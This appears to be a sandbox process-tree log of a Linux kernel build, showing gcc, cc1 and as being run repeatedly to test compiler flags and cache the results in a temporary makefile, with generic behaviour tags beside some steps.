/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D DISABLE_BRANCH_PROFILING /dev/null -quiet -dumpbase null -m16 "-march=i386" "-mregparm=3" -mno-mmx -mno-sse -auxbase-strip /tmp/a/.tmp_1645/tmp -g -Os -Werror -Wall -Wstrict-prototypes -fno-strict-aliasing -fomit-frame-pointer -fno-pic -ffreestanding -Wformat-security -o /tmp/ccqy0WQa.s5⤵PID:1648
-
/usr/local/sbin/asas --32 -o /tmp/a/.tmp_1645/tmp /tmp/ccqy0WQa.s5⤵PID:1649
-
/usr/local/bin/asas --32 -o /tmp/a/.tmp_1645/tmp /tmp/ccqy0WQa.s5⤵PID:1649
-
/usr/sbin/asas --32 -o /tmp/a/.tmp_1645/tmp /tmp/ccqy0WQa.s5⤵PID:1649
-
/usr/bin/asas --32 -o /tmp/a/.tmp_1645/tmp /tmp/ccqy0WQa.s5⤵PID:1649
-
/bin/rmrm -rf /tmp/a/.tmp_16454⤵PID:1650
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-m16_-g_-Os_-D__KERNEL___-DDISABLE_BRANCH_PROFILING_-Wall_-Wstrict-prototypes_-march_i386_-mregparm_3_-fno-strict-aliasing_-fomit-frame-pointer_-fno-pic_-mno-mmx_-mno-sse___-ffreestanding_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"_-ffreestanding\";_else_echo_\"\";_fi := -ffreestanding' >> /tmp/a/.cache.mk"3⤵
- Writes file to tmp directory
PID:1651 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -m16 -g -Os -D__KERNEL__ -DDISABLE_BRANCH_PROFILING -Wall -Wstrict-prototypes -march=i386 -mregparm=3 -fno-strict-aliasing -fomit-frame-pointer -fno-pic -mno-mmx -mno-sse -ffreestanding -fno-stack-protector -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \" -fno-stack-protector\"; else echo \"\"; fi"3⤵PID:1652
-
/bin/mkdirmkdir -p /tmp/a/.tmp_16524⤵PID:1653
-
/usr/bin/gccgcc -Werror -m16 -g -Os -D__KERNEL__ -DDISABLE_BRANCH_PROFILING -Wall -Wstrict-prototypes "-march=i386" "-mregparm=3" -fno-strict-aliasing -fomit-frame-pointer -fno-pic -mno-mmx -mno-sse -ffreestanding -fno-stack-protector -c -x c /dev/null -o /tmp/a/.tmp_1652/tmp4⤵
- Writes file to tmp directory
PID:1654 -
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D DISABLE_BRANCH_PROFILING /dev/null -quiet -dumpbase null -m16 "-march=i386" "-mregparm=3" -mno-mmx -mno-sse -auxbase-strip /tmp/a/.tmp_1652/tmp -g -Os -Werror -Wall -Wstrict-prototypes -fno-strict-aliasing -fomit-frame-pointer -fno-pic -ffreestanding -fno-stack-protector -Wformat-security -o /tmp/cc72gfN9.s5⤵PID:1655
-
/usr/local/sbin/asas --32 -o /tmp/a/.tmp_1652/tmp /tmp/cc72gfN9.s5⤵PID:1656
-
/usr/local/bin/asas --32 -o /tmp/a/.tmp_1652/tmp /tmp/cc72gfN9.s5⤵PID:1656
-
/usr/sbin/asas --32 -o /tmp/a/.tmp_1652/tmp /tmp/cc72gfN9.s5⤵PID:1656
-
/usr/bin/asas --32 -o /tmp/a/.tmp_1652/tmp /tmp/cc72gfN9.s5⤵
- Writes file to tmp directory
PID:1656 -
/bin/rmrm -rf /tmp/a/.tmp_16524⤵PID:1657
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-m16_-g_-Os_-D__KERNEL___-DDISABLE_BRANCH_PROFILING_-Wall_-Wstrict-prototypes_-march_i386_-mregparm_3_-fno-strict-aliasing_-fomit-frame-pointer_-fno-pic_-mno-mmx_-mno-sse__-ffreestanding__-fno-stack-protector_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"_-fno-stack-protector\";_else_echo_\"\";_fi := -fno-stack-protector' >> /tmp/a/.cache.mk"3⤵PID:1658
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -m16 -g -Os -D__KERNEL__ -DDISABLE_BRANCH_PROFILING -Wall -Wstrict-prototypes -march=i386 -mregparm=3 -fno-strict-aliasing -fomit-frame-pointer -fno-pic -mno-mmx -mno-sse -ffreestanding -fno-stack-protector -Wno-address-of-packed-member -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \" -Wno-address-of-packed-member\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1659 -
/bin/mkdirmkdir -p /tmp/a/.tmp_16594⤵PID:1660
-
/usr/bin/gccgcc -Werror -m16 -g -Os -D__KERNEL__ -DDISABLE_BRANCH_PROFILING -Wall -Wstrict-prototypes "-march=i386" "-mregparm=3" -fno-strict-aliasing -fomit-frame-pointer -fno-pic -mno-mmx -mno-sse -ffreestanding -fno-stack-protector -Wno-address-of-packed-member -c -x c /dev/null -o /tmp/a/.tmp_1659/tmp4⤵
- Writes file to tmp directory
PID:1661 -
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D DISABLE_BRANCH_PROFILING /dev/null -quiet -dumpbase null -m16 "-march=i386" "-mregparm=3" -mno-mmx -mno-sse -auxbase-strip /tmp/a/.tmp_1659/tmp -g -Os -Werror -Wall -Wstrict-prototypes -Wno-address-of-packed-member -fno-strict-aliasing -fomit-frame-pointer -fno-pic -ffreestanding -fno-stack-protector -Wformat-security -o /tmp/ccQiJiD9.s5⤵PID:1662
-
/usr/local/sbin/asas --32 -o /tmp/a/.tmp_1659/tmp /tmp/ccQiJiD9.s5⤵PID:1663
-
/usr/local/bin/asas --32 -o /tmp/a/.tmp_1659/tmp /tmp/ccQiJiD9.s5⤵PID:1663
-
/usr/sbin/asas --32 -o /tmp/a/.tmp_1659/tmp /tmp/ccQiJiD9.s5⤵PID:1663
-
/usr/bin/asas --32 -o /tmp/a/.tmp_1659/tmp /tmp/ccQiJiD9.s5⤵PID:1663
-
/bin/rmrm -rf /tmp/a/.tmp_16594⤵PID:1664
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-m16_-g_-Os_-D__KERNEL___-DDISABLE_BRANCH_PROFILING_-Wall_-Wstrict-prototypes_-march_i386_-mregparm_3_-fno-strict-aliasing_-fomit-frame-pointer_-fno-pic_-mno-mmx_-mno-sse__-ffreestanding_-fno-stack-protector__-Wno-address-of-packed-member_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"_-Wno-address-of-packed-member\";_else_echo_\"\";_fi := -Wno-address-of-packed-member' >> /tmp/a/.cache.mk"3⤵PID:1665
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -m16 -g -Os -D__KERNEL__ -DDISABLE_BRANCH_PROFILING -Wall -Wstrict-prototypes -march=i386 -mregparm=3 -fno-strict-aliasing -fomit-frame-pointer -fno-pic -mno-mmx -mno-sse -ffreestanding -fno-stack-protector -Wno-address-of-packed-member -mpreferred-stack-boundary=2 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \" -mpreferred-stack-boundary=2\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1666 -
/bin/mkdirmkdir -p /tmp/a/.tmp_16664⤵PID:1667
-
/usr/bin/gccgcc -Werror -m16 -g -Os -D__KERNEL__ -DDISABLE_BRANCH_PROFILING -Wall -Wstrict-prototypes "-march=i386" "-mregparm=3" -fno-strict-aliasing -fomit-frame-pointer -fno-pic -mno-mmx -mno-sse -ffreestanding -fno-stack-protector -Wno-address-of-packed-member "-mpreferred-stack-boundary=2" -c -x c /dev/null -o /tmp/a/.tmp_1666/tmp4⤵
- Writes file to tmp directory
PID:1668 -
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D DISABLE_BRANCH_PROFILING /dev/null -quiet -dumpbase null -m16 "-march=i386" "-mregparm=3" -mno-mmx -mno-sse "-mpreferred-stack-boundary=2" -auxbase-strip /tmp/a/.tmp_1666/tmp -g -Os -Werror -Wall -Wstrict-prototypes -Wno-address-of-packed-member -fno-strict-aliasing -fomit-frame-pointer -fno-pic -ffreestanding -fno-stack-protector -Wformat-security -o /tmp/ccD3JHZc.s5⤵PID:1669
-
/usr/local/sbin/asas --32 -o /tmp/a/.tmp_1666/tmp /tmp/ccD3JHZc.s5⤵PID:1670
-
/usr/local/bin/asas --32 -o /tmp/a/.tmp_1666/tmp /tmp/ccD3JHZc.s5⤵PID:1670
-
/usr/sbin/asas --32 -o /tmp/a/.tmp_1666/tmp /tmp/ccD3JHZc.s5⤵PID:1670
-
/usr/bin/asas --32 -o /tmp/a/.tmp_1666/tmp /tmp/ccD3JHZc.s5⤵PID:1670
-
/bin/rmrm -rf /tmp/a/.tmp_16664⤵PID:1671
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-m16_-g_-Os_-D__KERNEL___-DDISABLE_BRANCH_PROFILING_-Wall_-Wstrict-prototypes_-march_i386_-mregparm_3_-fno-strict-aliasing_-fomit-frame-pointer_-fno-pic_-mno-mmx_-mno-sse__-ffreestanding_-fno-stack-protector_-Wno-address-of-packed-member__-mpreferred-stack-boundary_2_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"_-mpreferred-stack-boundary_2\";_else_echo_\"\";_fi := -mpreferred-stack-boundary=2' >> /tmp/a/.cache.mk"3⤵PID:1672
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mno-avx\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1673 -
/bin/mkdirmkdir -p /tmp/a/.tmp_16734⤵PID:1674
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -c -x c /dev/null -o /tmp/a/.tmp_1673/tmp4⤵
- Writes file to tmp directory
PID:1675 -
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1673/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -fstack-protector-strong -o /tmp/ccQsvAWb.s5⤵PID:1676
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1673/tmp /tmp/ccQsvAWb.s5⤵PID:1677
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1673/tmp /tmp/ccQsvAWb.s5⤵PID:1677
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1673/tmp /tmp/ccQsvAWb.s5⤵PID:1677
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1673/tmp /tmp/ccQsvAWb.s5⤵
- Writes file to tmp directory
PID:1677 -
/bin/rmrm -rf /tmp/a/.tmp_16734⤵PID:1678
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-mno-avx\";_else_echo_\"\";_fi := -mno-avx' >> /tmp/a/.cache.mk"3⤵
- Writes file to tmp directory
PID:1679 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fcf-protection=none\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1680 -
/bin/mkdirmkdir -p /tmp/a/.tmp_16804⤵PID:1681
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -c -x c /dev/null -o /tmp/a/.tmp_1680/tmp4⤵PID:1682
-
/bin/rmrm -rf /tmp/a/.tmp_16804⤵PID:1683
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-fcf-protection_none_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-fcf-protection_none\";_else_echo_\"\";_fi := ' >> /tmp/a/.cache.mk"3⤵
- Writes file to tmp directory
PID:1684 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-falign-jumps=1\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1685 -
/bin/mkdirmkdir -p /tmp/a/.tmp_16854⤵PID:1686
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" -c -x c /dev/null -o /tmp/a/.tmp_1685/tmp4⤵PID:1687
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1685/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" -fstack-protector-strong -o /tmp/cccmc2Me.s5⤵PID:1688
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1685/tmp /tmp/cccmc2Me.s5⤵PID:1689
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1685/tmp /tmp/cccmc2Me.s5⤵PID:1689
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1685/tmp /tmp/cccmc2Me.s5⤵PID:1689
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1685/tmp /tmp/cccmc2Me.s5⤵
- Writes file to tmp directory
PID:1689 -
/bin/rmrm -rf /tmp/a/.tmp_16854⤵PID:1690
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-falign-jumps_1\";_else_echo_\"\";_fi := -falign-jumps=1' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1691 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-falign-loops=1\"; else echo \"\"; fi"3⤵PID:1692
-
/bin/mkdirmkdir -p /tmp/a/.tmp_16924⤵PID:1693
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -c -x c /dev/null -o /tmp/a/.tmp_1692/tmp4⤵
- Writes file to tmp directory
PID:1694 -
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1692/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -fstack-protector-strong -o /tmp/cczWGsFi.s5⤵PID:1695
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1692/tmp /tmp/cczWGsFi.s5⤵PID:1696
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1692/tmp /tmp/cczWGsFi.s5⤵PID:1696
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1692/tmp /tmp/cczWGsFi.s5⤵PID:1696
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1692/tmp /tmp/cczWGsFi.s5⤵PID:1696
-
/bin/rmrm -rf /tmp/a/.tmp_16924⤵PID:1697
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-falign-loops_1\";_else_echo_\"\";_fi := -falign-loops=1' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1698 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mno-80387\"; else echo \"\"; fi"3⤵PID:1699
-
/bin/mkdirmkdir -p /tmp/a/.tmp_16994⤵PID:1700
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -c -x c /dev/null -o /tmp/a/.tmp_1699/tmp4⤵PID:1701
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1699/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -fstack-protector-strong -o /tmp/ccyrF9jh.s5⤵PID:1702
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1699/tmp /tmp/ccyrF9jh.s5⤵PID:1703
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1699/tmp /tmp/ccyrF9jh.s5⤵PID:1703
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1699/tmp /tmp/ccyrF9jh.s5⤵PID:1703
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1699/tmp /tmp/ccyrF9jh.s5⤵
- Writes file to tmp directory
PID:1703 -
/bin/rmrm -rf /tmp/a/.tmp_16994⤵PID:1704
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-mno-80387\";_else_echo_\"\";_fi := -mno-80387' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
- Writes file to tmp directory
PID:1705 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mno-fp-ret-in-387\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1706 -
/bin/mkdirmkdir -p /tmp/a/.tmp_17064⤵PID:1707
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 -c -x c /dev/null -o /tmp/a/.tmp_1706/tmp4⤵PID:1708
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1706/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -fstack-protector-strong -o /tmp/ccbzI08g.s5⤵PID:1709
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1706/tmp /tmp/ccbzI08g.s5⤵PID:1710
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1706/tmp /tmp/ccbzI08g.s5⤵PID:1710
-
